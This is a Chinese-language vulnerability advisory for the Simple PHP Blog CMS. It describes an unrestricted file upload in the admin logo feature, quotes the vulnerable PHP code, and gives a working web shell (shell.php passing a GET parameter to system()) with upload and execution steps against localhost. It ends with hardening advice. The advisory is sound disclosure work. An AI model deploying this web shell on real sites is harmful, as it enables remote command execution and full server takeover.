BiggiDroid – 简单PHP博客CMS 产品页面:https://biggidroid.com/product/simple-php-blog/
严重
CVSS(估算): 9.8 (AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H)
简单PHP博客CMS 在管理面板的站点Logo上传功能中存在无限制文件上传漏洞。 经过身份验证的攻击者可以上传一个伪装成图片的恶意PHP文件,该文件存储在Web可访问目录中,并由服务器执行,从而导致远程命令执行。
管理面板 → 更新站点Logo
相关漏洞代码片段:
$target = "../image/".basename($_FILES['image']['name']);
$image = $_FILES['image']['name'];
$query = mysqli_query($con,
"UPDATE sitedetails SET sitelogo='$image' WHERE id='$id'");
if (move_uploaded_file($_FILES['image']['tmp_name'], $target)) {
// success
}
创建名为 shell.php 的文件:
<?php
$cmd = $_GET['cmd'] ?? '';
echo "<pre>";
system($cmd);
echo "</pre>";
?>
shell.php 作为Logo文件上传📌 应用程序接受PHP文件而无任何验证
上传后,文件可通过以下地址访问:
http://127.0.0.1/image/shell.php
执行系统命令:
http://127.0.0.1/image/shell.php?cmd=dir
服务器执行操作系统命令并返回输出,确认远程代码执行。





攻击者可以:
该漏洞可能导致完全服务器接管。
.htaccess / 服务器加固限制文件扩展名
$allowed = ['jpg','jpeg','png','gif'];
验证MIME类型
finfo_file()
重命名上传文件